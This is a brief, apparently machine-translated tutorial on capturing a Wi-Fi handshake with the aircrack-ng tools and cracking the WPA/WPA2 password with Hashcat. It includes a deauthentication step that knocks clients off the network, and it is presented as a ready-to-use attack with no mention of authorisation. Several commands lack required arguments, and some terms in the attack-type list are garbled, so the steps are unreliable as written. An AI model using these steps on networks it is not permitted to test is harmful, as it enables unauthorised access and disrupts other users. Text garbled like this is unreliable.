Cracking WPA2/WPA passwords using Hashcat in Kali Linux
Hashcat, as a modest note the authors, this is the quickest tool for password recovery using the GPU. The program is free, although it contains proprietary code base. Versions are available for Linux, OSX, and Windows, there are options for the central computer CPU and GPU. Hashcat currently supports a huge number of hashing algorithms, including Microsoft LM Hashes, MD4, MD5, SHA family, Unix Crypt format, MySQL, Cisco PIX, and many others.
The types of attacks
- Brute-force attack (attack)
- combinatorial attack
- Dictionary Attack
- Attack on prints
- hybrid attack
- Mask attack
- permutation attack
- The attack is based on rules
- tabular attack
- Attack switching layouts
Cracking WPA2 / WPA passwords using Hashcat
Step 1: Start wifi card monitor mode
airmon-ng start wlan0
Step 2: Capturing wifi package using airodump-ng:
airodump-ng wlan0mon
Step 3: Choose wifi network and capture this wifi network package
airodump-ng –bssid -c –write wlan0mon
Step 4: Take the handshake:
aireplay-ng –deauth -a wlan0mon
Step 5: Get handshake package
wpaclean
Step 6: Convert pcap format to hccap
aircrack-ng -J
Step 7: Crack hccap:
hashcat -m 2500 wordlist